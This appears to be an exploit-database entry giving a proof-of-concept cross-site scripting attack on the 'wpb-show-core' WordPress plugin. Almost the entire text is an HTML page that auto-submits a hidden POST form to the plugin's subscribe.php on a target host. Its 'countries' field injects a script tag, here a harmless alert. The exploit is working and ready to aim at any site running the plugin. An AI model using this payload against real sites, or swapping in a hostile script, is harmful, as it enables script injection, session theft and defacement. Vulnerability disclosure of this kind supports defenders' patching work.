Share
## https://sploitus.com/exploit?id=WPEX-ID:D7034AC2-0098-48D2-9BA9-87E09B178F7D
Open an HTML file containing the following:
```
<html>
<body>
<form action="https://example.com/wp-content/plugins/wpb-show-core/auto-suggest-categories/subscribe.php" id="hack" method="POST">
<input type="hidden" name="firstname" value="test" />
<input type="hidden" name="lastname" value="test2" />
<input type="hidden" name="countries" value='xxxxxx"><script>alert(/XSS/)</script>' />
<input type="submit" value="Submit request" />
</form>
</body>
<script>
var form1 = document.getElementById('hack');
form1.submit();
</script>
</html>
```